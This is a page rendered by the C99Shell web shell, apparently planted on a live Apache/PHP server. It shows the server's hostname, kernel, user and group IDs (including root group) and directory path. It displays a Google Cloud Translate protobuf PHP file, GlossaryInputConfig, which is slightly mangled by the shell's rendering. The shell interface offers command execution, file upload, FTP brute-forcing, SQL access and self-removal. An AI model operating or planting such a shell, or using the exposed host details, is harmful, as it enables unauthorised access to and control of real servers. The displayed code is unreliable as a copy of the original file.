!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/cloud-translate/src/V3/   drwxr-xr-x
Free 29.23 GB of 117.98 GB (24.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GlossaryInputConfig.php (4.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/cloud/translate/v3/translation_service.proto

namespace Google\Cloud\Translate\V3;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * Input configuration for glossaries.
 *
 * Generated from protobuf message <code>google.cloud.translation.v3.GlossaryInputConfig</code>
 */
class GlossaryInputConfig extends \Google\Protobuf\Internal\Message
{
    protected 
$source;

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type \Google\Cloud\Translate\V3\GcsSource $gcs_source
     *           Required. Google Cloud Storage location of glossary data.
     *           File format is determined based on the filename extension. API returns
     *           [google.rpc.Code.INVALID_ARGUMENT] for unsupported URI-s and file
     *           formats. Wildcards are not allowed. This must be a single file in one of
     *           the following formats:
     *           For unidirectional glossaries:
     *           - TSV/CSV (`.tsv`/`.csv`): Two column file, tab- or comma-separated.
     *             The first column is source text. The second column is target text.
     *             No headers in this file. The first row contains data and not column
     *             names.
     *           - TMX (`.tmx`): TMX file with parallel data defining source/target term
     *           pairs.
     *           For equivalent term sets glossaries:
     *           - CSV (`.csv`): Multi-column CSV file defining equivalent glossary terms
     *             in multiple languages. See documentation for more information -
     *             [glossaries](https://cloud.google.com/translate/docs/advanced/glossary).
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Cloud\Translate\V3\TranslationService::initOnce();
        
parent::__construct($data);
    }

    
/**
     * Required. Google Cloud Storage location of glossary data.
     * File format is determined based on the filename extension. API returns
     * [google.rpc.Code.INVALID_ARGUMENT] for unsupported URI-s and file
     * formats. Wildcards are not allowed. This must be a single file in one of
     * the following formats:
     * For unidirectional glossaries:
     * - TSV/CSV (`.tsv`/`.csv`): Two column file, tab- or comma-separated.
     *   The first column is source text. The second column is target text.
     *   No headers in this file. The first row contains data and not column
     *   names.
     * - TMX (`.tmx`): TMX file with parallel data defining source/target term
     * pairs.
     * For equivalent term sets glossaries:
     * - CSV (`.csv`): Multi-column CSV file defining equivalent glossary terms
     *   in multiple languages. See documentation for more information -
     *   [glossaries](https://cloud.google.com/translate/docs/advanced/glossary).
     *
     * Generated from protobuf field <code>.google.cloud.translation.v3.GcsSource gcs_source = 1;</code>
     * @return \Google\Cloud\Translate\V3\GcsSource|null
     */
    
public function getGcsSource()
    {
        return 
$this->readOneof(1);
    }

    public function 
hasGcsSource()
    {
        return 
$this->hasOneof(1);
    }

    
/**
     * Required. Google Cloud Storage location of glossary data.
     * File format is determined based on the filename extension. API returns
     * [google.rpc.Code.INVALID_ARGUMENT] for unsupported URI-s and file
     * formats. Wildcards are not allowed. This must be a single file in one of
     * the following formats:
     * For unidirectional glossaries:
     * - TSV/CSV (`.tsv`/`.csv`): Two column file, tab- or comma-separated.
     *   The first column is source text. The second column is target text.
     *   No headers in this file. The first row contains data and not column
     *   names.
     * - TMX (`.tmx`): TMX file with parallel data defining source/target term
     * pairs.
     * For equivalent term sets glossaries:
     * - CSV (`.csv`): Multi-column CSV file defining equivalent glossary terms
     *   in multiple languages. See documentation for more information -
     *   [glossaries](https://cloud.google.com/translate/docs/advanced/glossary).
     *
     * Generated from protobuf field <code>.google.cloud.translation.v3.GcsSource gcs_source = 1;</code>
     * @param \Google\Cloud\Translate\V3\GcsSource $var
     * @return $this
     */
    
public function setGcsSource($var)
    {
        
GPBUtil::checkMessage($var\Google\Cloud\Translate\V3\GcsSource::class);
        
$this->writeOneof(1$var);

        return 
$this;
    }

    
/**
     * @return string
     */
    
public function getSource()
    {
        return 
$this->whichOneof("source");
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--